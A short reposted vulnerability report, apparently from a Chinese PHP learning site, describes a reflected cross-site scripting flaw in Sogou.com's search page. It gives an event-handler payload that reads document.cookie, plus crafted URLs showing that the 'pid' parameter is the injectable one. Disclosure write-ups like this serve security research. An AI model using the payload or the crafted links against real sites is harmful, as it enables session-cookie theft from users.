网站地图    收藏   

主页 > 后端 > 网站安全 >

XSS found on Sogou.com - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 12:00 作者: 阅读:

[导读] There is a XSS found on Sogou.comSeverity: XSSConfidence: ConfidentHost: http://sogou.comPath: /Issue detail:If you enter the following XSS vector for the search field:vide......

There is a XSS found on Sogou.com

Severity: XSS
Confidence: Confident
Host: http://sogou.com
Path: /
 
Issue detail:
If you enter the following XSS vector for the search field:
"><video><source onerror=alert(document.cookie)>
 
I will get back the following page:
http://www.sogou.com/sogou?pid=AQxRG&query="><video><source onerror=alert(document.cookie)>
However, this particular results page will not cause any XSS.
 
However, after looking at the page for several minutes, the actual parameter that will cause XSS is actually pid
http://www.sogou.com/sogou?pid=AQxRG"><video><source onerror=alert(document.cookie)>&query="><video><source onerror=alert(document.cookie)>

Using the above link, you will see a XSS like the image below.
 


 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论